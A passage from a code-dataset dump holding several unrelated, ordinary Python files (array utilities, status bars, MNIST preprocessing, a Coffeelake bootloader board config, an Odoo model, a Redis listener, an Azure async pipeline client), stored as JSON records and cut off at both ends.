elm in arr:\n if elm != 0:\n wrk_arr1.append(elm)\n else:\n wrk_arr2.append(elm)\n\n # Return a list of nonzero and zero elements (in that order)\n return [*wrk_arr1, *wrk_arr2]\n\n\nif __name__ == '__main__':\n # Use the main function here to test out your implementation\n arr = [0, 3, 1, 0, -2]\n\n print(f\"The resulting of moving_zeroes is: {moving_zeroes(arr)}\")","sub_path":"moving_zeroes/moving_zeroes.py","file_name":"moving_zeroes.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"562475250","text":"from __future__ import print_function\n\nimport os, sys, glob\n\nCLEAR_LINE = '\\x1b[2K'\nSTART_LINE = '\\x1B[0E'\n\ndef status_bar(n, n_max):\n n_jump = max(1,int(n_max/100))\n assert n<=n_max, 'n must be less than or equal to n_max'\n if (n==n_max):\n print('\\r>> 100 %')\n elif (n%n_jump==0):\n print('\\r>> {:3d} %'.format(int(round(100.0*n/n_max,0))), end='')\n sys.stdout.flush()\n\ndef status_bar_2(n, n_max, width=50):\n assert n<=n_max, 'n must be less than or equal to n_max'\n if (n==n_max):\n print('\\r>> 100 % [{}]'.format('='*width))\n return\n # Get a spacing so that at most 100 updates are performed\n n_jump = max(1,int(n_max/100.0))\n # Check if we're on this spacing\n if (n%n_jump==0):\n frac = (1.0*n)/n_max\n num_bars = int(width*frac)\n bars = '='*num_bars\n blanks = ' '*(width-num_bars-1)\n perc = int(100.0*frac)\n print('\\r>> {:3d} % [{}>{}]'.format(perc, bars, blanks), end='')\n sys.stdout.flush()\n\n","sub_path":"bamboo/common/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157421845","text":"import logging\n\nfrom pywintypes import error as Win32Error\nfrom win32api import OpenProcess\nfrom win32file import CloseHandle\nfrom win32event import SYNCHRONIZE\n\nfrom .base import ProgramBase\n\n\nlog = logging.getLogger(__name__)\n\nclass NTProgram(ProgramBase):\n\n\n @property\n def is_running(self):\n\n pid = self.state.get('pid')\n if not pid:\n return False\n\n try:\n handle = OpenProcess(SYNCHRONIZE, 0, pid)\n return True\n except Win32Error:\n return False\n finally:\n CloseHandle(handle)\n\n","sub_path":"chalmers/program/nt.py","file_name":"nt.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633226075","text":"import numpy as np\nfrom keras.datasets import mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nX_train = x_train.reshape(x_train.shape[0], x_train.shape[1]*x_train.shape[2])\nX_train=X_train/255\n#X_train = np.array(X_train).T\nY_train = (np.arange(10)==y_train[:, None]).astype(int)\n#Y_train = np.array(Y_train).T\n \nX_test = x_test.reshape(x_test.shape[0], x_test.shape[1] * x_test.shape[2])\nX_test=X_test/255\n#X_test = np.array(X_test).T\nY_test = (np.arange(10) == y_test[:, None]).astype(int)\n#Y_test = np.array(Y_test).T\n \n\n\n# stack together for next step\nX = np.vstack((x_train, x_test))\ny = np.vstack((y_train, y_test))\n\n\n# one-hot encoding\ndigits = 10\nexamples = y.shape[0]\ny = y.reshape(1, examples)\nY_new = np.eye(digits)[y.astype('int32')]\nY_new = Y_new.T.reshape(digits, examples)\n\n\n# number of training set\nm = 60000\nm_test = X.shape[0] - m\nX_train, X_test = X[:m].T, X[m:].T\nY_train, Y_test = Y_new[:, :m], Y_new[:, m:]\n\n\n# shuffle training set\nshuffle_index = np.random.permutation(m)\nX_train, Y_train = X_train[:, shuffle_index], Y_train[:, shuffle_index]","sub_path":".history/yjs/numpy_20210606172826.py","file_name":"numpy_20210606172826.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"323668125","text":"## @file\r\n# This file is used to provide board specific image information.\r\n#\r\n# Copyright (c) 2017-2019, Intel Corporation. All rights reserved.
\r\n#\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\n##\r\n# Import Modules\r\n#\r\nimport os\r\nimport sys\r\nimport shutil\r\nimport time\r\n\r\nsys.dont_write_bytecode = True\r\nsys.path.append (os.path.join('..', '..'))\r\nfrom BuildLoader import BaseBoard, STITCH_OPS, FLASH_REGION_TYPE\r\n\r\nclass Board(BaseBoard):\r\n def __init__(self, *args, **kwargs):\r\n\r\n super(Board, self).__init__(*args, **kwargs)\r\n\r\n self.VERINFO_IMAGE_ID = 'SB_CFL'\r\n self.VERINFO_PROJ_MAJOR_VER = 1\r\n self.VERINFO_PROJ_MINOR_VER = 1\r\n self.VERINFO_SVN = 1\r\n self.VERINFO_BUILD_DATE = time.strftime(\"%m/%d/%Y\")\r\n self.LOWEST_SUPPORTED_FW_VER = ((self.VERINFO_PROJ_MAJOR_VER << 8) + self.VERINFO_PROJ_MINOR_VER)\r\n\r\n self.BOARD_NAME = 'cfl'\r\n self.BOARD_PKG_NAME = 'CoffeelakeBoardPkg'\r\n self.SILICON_PKG_NAME = 'CoffeelakePkg'\r\n\r\n self.PCI_EXPRESS_BASE = 0xE0000000\r\n self.PCI_IO_BASE = 0x00003000\r\n self.PCI_MEM32_BASE = 0x9F000000\r\n self.ACPI_PM_TIMER_BASE = 0x1808\r\n\r\n self.FLASH_BASE_ADDRESS = 0xFE000000\r\n self.FLASH_BASE_SIZE = (self.FLASH_LAYOUT_START - self.FLASH_BASE_ADDRESS)\r\n\r\n self.HAVE_FIT_TABLE = 1\r\n self.HAVE_VBT_BIN = 1\r\n self.HAVE_VERIFIED_BOOT = 1\r\n self.HAVE_MEASURED_BOOT = 1\r\n self.HAVE_ACPI_TABLE = 1\r\n self.ENABLE_SPLASH = 1\r\n self.ENABLE_FRAMEBUFFER_INIT = 1\r\n self.HAVE_PSD_TABLE = 1\r\n self.ENABLE_GRUB_CONFIG = 1\r\n self.ENABLE_CSME_UPDATE = 0\r\n self.ENABLE_DMA_PROTECTION = 0\r\n self.DEBUG_PORT_NUMBER = 0xFF\r\n\r\n # CSME update library is required to enable this option and will be available as part of CSME kit\r\n self.BUILD_CSME_UPDATE_DRIVER = 0\r\n\r\n # To enable source debug, set 1 to self.ENABLE_SOURCE_DEBUG\r\n self.ENABLE_SOURCE_DEBUG = 0\r\n # If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored\r\n self.SKIP_STAGE1A_SOURCE_DEBUG = 0\r\n\r\n if self.HAVE_FIT_TABLE:\r\n self.FIT_ENTRY_MAX_NUM = 12\r\n\r\n self.STAGE1A_SIZE = 0x00010000\r\n self.STAGE1B_SIZE = 0x000DB000\r\n self.STAGE2_SIZE = 0x00080000\r\n if self.ENABLE_SOURCE_DEBUG:\r\n self.STAGE1B_SIZE += 0x4000\r\n\r\n self.ENABLE_FWU = 1\r\n self.ENABLE_SMBIOS = 1\r\n\r\n # Verify required minimum FSP version\r\n self.MIN_FSP_REVISION = 0x07006550\r\n # Verify FSP image ID. Empty string means skipping verification\r\n self.FSP_IMAGE_ID = '$CFLFSP$'\r\n\r\n self.STAGE1B_XIP = 1\r\n\r\n # Stack settings to run FspMemoryInit\r\n self.FSP_M_STACK_TOP = 0xFEF3FF00\r\n\r\n self.STAGE2_FD_BASE = 0x01000000\r\n self.STAGE2_FD_SIZE = 0x000E0000\r\n\r\n self.STAGE1_STACK_SIZE = 0x00002000\r\n self.STAGE1_DATA_SIZE = 0x00014000\r\n\r\n self.PAYLOAD_EXE_BASE = 0x00B00000\r\n self.PAYLOAD_SIZE = 0x00028000\r\n if len(self._PAYLOAD_NAME.split(';')) > 1:\r\n self.UEFI_VARIABLE_SIZE = 0x00040000\r\n else:\r\n self.UEFI_VARIABLE_SIZE = 0x1000\r\n self.EPAYLOAD_SIZE = 0x00190000\r\n self.UCODE_SIZE = 0x00080000\r\n self.MRCDATA_SIZE = 0x00008000\r\n self.CFGDATA_SIZE = 0x00004000\r\n self.KEYHASH_SIZE = 0x00001000\r\n self.VARIABLE_SIZE = 0x00002000\r\n self.SBLRSVD_SIZE = 0x00001000\r\n self.FWUPDATE_SIZE = 0x00020000 if self.ENABLE_FWU else 0\r\n\r\n self.TOP_SWAP_SIZE = 0x020000\r\n self.REDUNDANT_SIZE = self.UCODE_SIZE + self.STAGE2_SIZE + self.STAGE1B_SIZE + \\\r\n self.FWUPDATE_SIZE + self.CFGDATA_SIZE + self.KEYHASH_SIZE\r\n self.NON_REDUNDANT_SIZE = 0x3BF000\r\n self.NON_VOLATILE_SIZE = 0x001000\r\n self.SLIMBOOTLOADER_SIZE = (self.TOP_SWAP_SIZE + self.REDUNDANT_SIZE) * 2 + \\\r\n self.NON_REDUNDANT_SIZE + self.NON_VOLATILE_SIZE\r\n\r\n self.PLD_HEAP_SIZE = 0x04000000\r\n self.PLD_STACK_SIZE = 0x00020000\r\n self.PLD_RSVD_MEM_SIZE = 0x00500000\r\n\r\n # TBD: ACM/KM/BPM Size, as of Sep 2017\r\n # ACM size is fixed 100KB, KM size is fixed 0x400, BPM size is fixed 0x600\r\n self.KM_SIZE = 0x00000400\r\n self.BPM_SIZE = 0x00000600\r\n self.ACM_SIZE = 0x00008000 + self.KM_SIZE + self.BPM_SIZE\r\n # adjust ACM_SIZE to meet 128KB alignment (to align 100KB ACM size)\r\n if self.ACM_SIZE > 0:\r\n acm_top = self.FLASH_LAYOUT_START - self.STAGE1A_SIZE\r\n acm_btm = acm_top - self.ACM_SIZE\r\n acm_btm = (acm_btm & 0xFFFE0000)\r\n self.ACM_SIZE = acm_top - acm_btm\r\n\r\n self.CFGDATA_REGION_TYPE = FLASH_REGION_TYPE.BIOS\r\n self.SPI_IAS_REGION_TYPE = FLASH_REGION_TYPE.BIOS\r\n\r\n self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE + 0x4000\r\n self._CFGDATA_INT_FILE = ['CfgDataInt_Cfls.dlt', 'CfgDataInt_Cflh.dlt', 'CfgDataInt_Whl.dlt']\r\n self._CFGDATA_EXT_FILE = ['CfgDataExt_Upx.dlt']\r\n\r\n def GetPlatformDsc (self):\r\n dsc = {}\r\n common_libs = [\r\n 'LoaderLib|Platform/CommonBoardPkg/Library/LoaderLib/LoaderLib.inf',\r\n 'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf',\r\n 'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf',\r\n 'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf',\r\n 'PchSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/PchSbiAccessLib/PchSbiAccessLib.inf',\r\n 'PchInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/PchInfoLib/PchInfoLib.inf',\r\n 'PchSerialIoLib|Silicon/$(SILICON_PKG_NAME)/Library/PchSerialIoLib/PchSerialIoLib.inf',\r\n 'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf',\r\n 'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf',\r\n 'BdatLib|Silicon/$(SILICON_PKG_NAME)/Library/BdatLib/BdatLib.inf',\r\n 'BootMediaLib|Silicon/$(SILICON_PKG_NAME)/Library/BootMediaLib/BootMediaLib.inf',\r\n 'StageCommonLib|Silicon/$(SILICON_PKG_NAME)/Library/StageCommonLib/StageCommonLib.inf',\r\n 'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib/BootGuardLib.inf',\r\n 'SgxLib|Silicon/$(SILICON_PKG_NAME)/Library/SgxLib/SgxLib.inf',\r\n 'PsdLib|Silicon/$(SILICON_PKG_NAME)/Library/PsdLib/PsdLib.inf',\r\n 'HeciLib|Silicon/$(SILICON_PKG_NAME)/Library/HeciLib/HeciLib.inf',\r\n 'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf',\r\n 'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf'\r\n ]\r\n if self.BUILD_CSME_UPDATE_DRIVER:\r\n common_libs.append ('MeFwUpdateLib|Silicon/$(SILICON_PKG_NAME)/Library/MeFwUpdateLib/MeFwUpdateLib.inf')\r\n dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs\r\n return dsc\r\n\r\n def GetKeyHashList (self):\r\n # Define a set of new key used for different purposes\r\n # The key is either key id or public key PEM format or private key PEM format\r\n pub_key_list = [\r\n (\r\n # Key for verifying Config data blob\r\n HASH_USAGE['PUBKEY_CFG_DATA'],\r\n 'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n (\r\n # Key for verifying firmware update\r\n HASH_USAGE['PUBKEY_FWU'],\r\n 'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n (\r\n # Key for verifying container header\r\n HASH_USAGE['PUBKEY_CONT_DEF'],\r\n 'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n (\r\n # key for veryfying OS image.\r\n HASH_USAGE['PUBKEY_OS'],\r\n 'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n ]\r\n return pub_key_list\r\n\r\n def GetImageLayout (self):\r\n img_list = []\r\n\r\n acm_flag = 0 if self.ACM_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR\r\n fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR\r\n cfg_flag = 0 if len(self._CFGDATA_EXT_FILE) > 0 and self.CFGDATA_REGION_TYPE == FLASH_REGION_TYPE.BIOS else STITCH_OPS.MODE_FILE_IGNOR\r\n\r\n # output files need to have unique base name (excluding file extension)\r\n # output files ends with 'rom' extension will be copied over for final stitching\r\n img_list.extend ([\r\n ('NON_VOLATILE.bin', [\r\n ('SBLRSVD.bin', '' , self.SBLRSVD_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('NON_REDUNDANT.bin', [\r\n ('VARIABLE.bin' , '' , self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ('MRCDATA.bin' , '' , self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ('EPAYLOAD.bin', '' , self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('UEFIVARIABLE.bin', '' , self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ('PAYLOAD.bin' , 'Lz4' , self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('REDUNDANT_A.bin', [\r\n ('UCODE.bin' , '' , self.UCODE_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE2.fd' , 'Lz4' , self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('FWUPDATE.bin' , 'Lzma' , self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('CFGDATA.bin' , '' , self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD | cfg_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('KEYHASH.bin' , '' , self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1B_A.fd' , '' , self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('REDUNDANT_B.bin', [\r\n ('UCODE.bin' , '' , self.UCODE_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE2.fd' , 'Lz4' , self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('FWUPDATE.bin' , 'Lzma' , self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('CFGDATA.bin' , '' , self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD | cfg_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('KEYHASH.bin' , '' , self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1B_B.fd' , '' , self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('TOP_SWAP_A.bin', [\r\n ('ACM.bin' , '' , self.ACM_SIZE, STITCH_OPS.MODE_FILE_NOP | acm_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1A_A.fd' , '' , self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('TOP_SWAP_B.bin', [\r\n ('ACM.bin' , '' , self.ACM_SIZE, STITCH_OPS.MODE_FILE_NOP | acm_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1A_B.fd' , '' , self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('SlimBootloader.bin', [\r\n ('NON_VOLATILE.bin' , '' , self.NON_VOLATILE_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('NON_REDUNDANT.bin' , '' , self.NON_REDUNDANT_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('REDUNDANT_B.bin' , '' , self.REDUNDANT_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('REDUNDANT_A.bin' , '' , self.REDUNDANT_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('TOP_SWAP_B.bin' , '' , self.TOP_SWAP_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('TOP_SWAP_A.bin' , '' , self.TOP_SWAP_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ]\r\n ),\r\n ])\r\n\r\n return img_list\r\n","sub_path":"Platform/CoffeelakeBoardPkg/BoardConfig.py","file_name":"BoardConfig.py","file_ext":"py","file_size_in_byte":13163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"483221147","text":"from odoo import api, fields, models\nfrom odoo.tools.translate import _\n\n\nclass ProjectProject(models.Model):\n _inherit = 'project.project'\n\n event_number = fields.Integer(compute='_compute_event_number',\n string='Number of Meetings')\n\n label_tasks = fields.Char(translate=True,\n default=lambda self: _(\"Tasks\"),\n help=\"Gives label to tasks on project's kanban \"\n \"view.\")\n\n label_issues = fields.Char(translate=True,\n default=lambda self: _(\"Issues\"))\n\n def _compute_task_count(self):\n for partner in self:\n part = partner.task_ids.filtered(\n lambda r: r.state not in ['done', 'cancelled'])\n partner.task_count = len(part)\n\n @api.multi\n def _compute_event_number(self):\n for record in self:\n cal_events = record.calendar_event_ids.filtered(\n lambda r: r.event_state == 'open')\n record.event_number = len(cal_events)\n\n @api.multi\n def action_make_meeting(self):\n \"\"\" This opens Meeting's calendar view to schedule meeting on\n current applicant\n @return: Dictionary value for created Meeting view\n \"\"\"\n self.ensure_one()\n\n task_owner_id = self.env['res.users'].browse(self.env.uid)\n partners = task_owner_id.partner_id | self.user_id.partner_id\n\n category = self.env.ref('calendar.categ_meet1')\n\n res = self.env['ir.actions.act_window'].for_xml_id(\n 'calendar', 'action_calendar_event')\n\n res['context'] = {\n 'search_default_partner_ids': task_owner_id.name,\n 'search_default_project_id': self.id,\n 'default_partner_id': self.partner_id.id,\n 'default_partner_ids': partners.ids,\n 'default_user_id': self.env.uid,\n 'default_name': self.name,\n 'default_project_id': self.id,\n 'default_categ_ids': category and [category.id] or False,\n }\n\n return res\n","sub_path":"project_task_count_calendar_event/models/project_project.py","file_name":"project_project.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"555498831","text":"import redis\nimport json\nfrom decouple import config\n\nREDIS_HOST = config('REDIS_HOST')\nREDIS_PORT = config('REDIS_PORT')\nREDIS_DB = config('REDIS_DB')\nredis_url = f'redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_DB}'\nchannel = 'logger'\n\nclass PubSubListener(object):\n def __init__(self):\n self.clients = []\n self._connection()\n def _connection(self):\n self.pubsub = redis.StrictRedis.from_url(redis_url, decode_responses=True).pubsub(\n ignore_subscribe_messages=False)\n self.pubsub.subscribe(**{channel: self.handler})\n self.thread = self.pubsub.run_in_thread(sleep_time=0.001)\n def register(self, client):\n self.clients.append(client)\n\n def handler(self, message):\n _message = message['data']\n print(_message)\n if type(_message) != int:\n self.send(_message)\n\n\n def send(self, data):\n for client in self.clients:\n try:\n client.send(data)\n except Exception:\n self.clients.remove(client)\n\nclass RedisChache:\n def __init__(self):\n self._connection()\n\n def _connection(self):\n self.connect = redis.StrictRedis.from_url(redis_url, decode_responses=True)","sub_path":"logs-service/snake-vision-sockets-consumer/RedisListener.py","file_name":"RedisListener.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538792917","text":"# --------------------------------------------------------------------------\n#\n# Copyright (c) Microsoft Corporation. All rights reserved.\n#\n# The MIT License (MIT)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"\"Software\"\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n#\n# --------------------------------------------------------------------------\n\nimport logging\nimport os\nimport sys\ntry:\n from urlparse import urljoin, urlparse\nexcept ImportError:\n from urllib.parse import urljoin, urlparse\nimport warnings\nimport xml.etree.ElementTree as ET\n\nfrom typing import List, Any, Dict, Union, IO, Tuple, Optional, Callable, Iterator, cast, TYPE_CHECKING # pylint: disable=unused-import\n\nfrom .pipeline import AsyncPipeline\nfrom .pipeline.policies import ContentDecodePolicy\nfrom .pipeline.transport import HttpRequest, AioHttpTransport\n\n_LOGGER = logging.getLogger(__name__)\n\nclass AsyncPipelineClient(object):\n \"\"\"Service client core methods.\n\n This contains methods are sans I/O and not tight to sync or async implementation.\n :param Configuration config: Service configuration.\n \"\"\"\n\n def __init__(self, base_url, config, **kwargs):\n if config is None:\n raise ValueError(\"Config is a required parameter\")\n self._config = config\n self._base_url = base_url\n if kwargs.get('pipeline'):\n self._pipeline = kwargs['pipeline']\n else:\n transport = kwargs.get('transport')\n if not transport:\n transport = AioHttpTransport(config, **kwargs)\n self._pipeline = self._build_pipeline(config, transport)\n\n def _build_pipeline(self, config, transport):\n policies = [\n config.headers_policy,\n config.user_agent_policy,\n ContentDecodePolicy(),\n config.redirect_policy,\n config.retry_policy,\n config.custom_hook_policy,\n config.logging_policy,\n ]\n return AsyncPipeline(transport, policies)\n\n def _request(self, method, url, params, headers, content, form_content, stream_content):\n # type: (str, str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create HttpRequest object.\n\n :param str url: URL for the request.\n :param dict params: URL query parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = HttpRequest(method, self.format_url(url))\n\n if params:\n request.format_parameters(params)\n\n if headers:\n request.headers.update(headers)\n\n if content is not None:\n if isinstance(content, ET.Element):\n request.set_xml_body(content)\n else:\n try:\n request.set_json_body(content)\n except TypeError:\n request.data = content\n\n if form_content:\n request.set_formdata_body(form_content)\n elif stream_content:\n request.set_streamed_data_body(stream_content)\n\n return request\n\n def format_url(self, url_template, **kwargs):\n # type: (str, Any) -> str\n \"\"\"Format request URL with the client base URL, unless the\n supplied URL is already absolute.\n\n :param str url_template: The request URL to be formatted if necessary.\n \"\"\"\n url = url_template.format(**kwargs)\n parsed = urlparse(url)\n if not parsed.scheme or not parsed.netloc:\n url = url.lstrip('/')\n base = self._base_url.format(**kwargs).rstrip('/')\n url = urljoin(base + '/', url)\n return url\n\n def get(self, url, params=None, headers=None, content=None, form_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a GET request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('GET', url, params, headers, content, form_content, None)\n request.method = 'GET'\n return request\n\n def put(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a PUT request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('PUT', url, params, headers, content, form_content, stream_content)\n return request\n\n def post(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a POST request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('POST', url, params, headers, content, form_content, stream_content)\n return request\n\n def head(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a HEAD request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('HEAD', url, params, headers, content, form_content, None)\n return request\n\n def patch(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a PATCH request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('PATCH', url, params, headers, content, form_content, stream_content)\n return request\n\n def delete(self, url, params=None, headers=None, content=None, form_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a DELETE request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('DELETE', url, params, headers, content, form_content, None)\n return request\n\n def merge(self, url, params=None, headers=None, content=None, form_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a MERGE request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('MERGE', url, params, headers, content, form_content, None)\n return request\n\n async def __aenter__(self):\n await self._pipeline.__aenter__()\n return self\n\n async def __aexit__(self, *args):\n await self.close()\n\n async def close(self):\n await self._pipeline.__aexit__()","sub_path":"sdk/core/azure-core/azure/core/pipeline_client_async.py","file_name":"pipeline_client_async.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"602159629","text":"from pymongo import MongoClient\nimport datetime\nimport csv\n\nclient = MongoClient(\"localhost\", 27017)\ndb = client.reddit\n\n\ntime_start = datetime.datetime.now()\ntime_end = datetime.datetime.now()\nelapsed_time = time_end - time_start\n\noutput_file_one_or_less = open(\"one_or_less_comments.csv\", 'w')\n\ndef timing():\n\tglobal time_start\n\tglobal time_end\n\tglobal elapsed_time\n\tprint(\"Started: \", time_start)\n\tprint(\"Finished: \", time_end)\n\tprint(\"Time difference: \", elapsed_time)\n\n\tprint(divmod(elapsed_time.total_seconds(), 60))\n\n\ndef get_sample_data(collection, 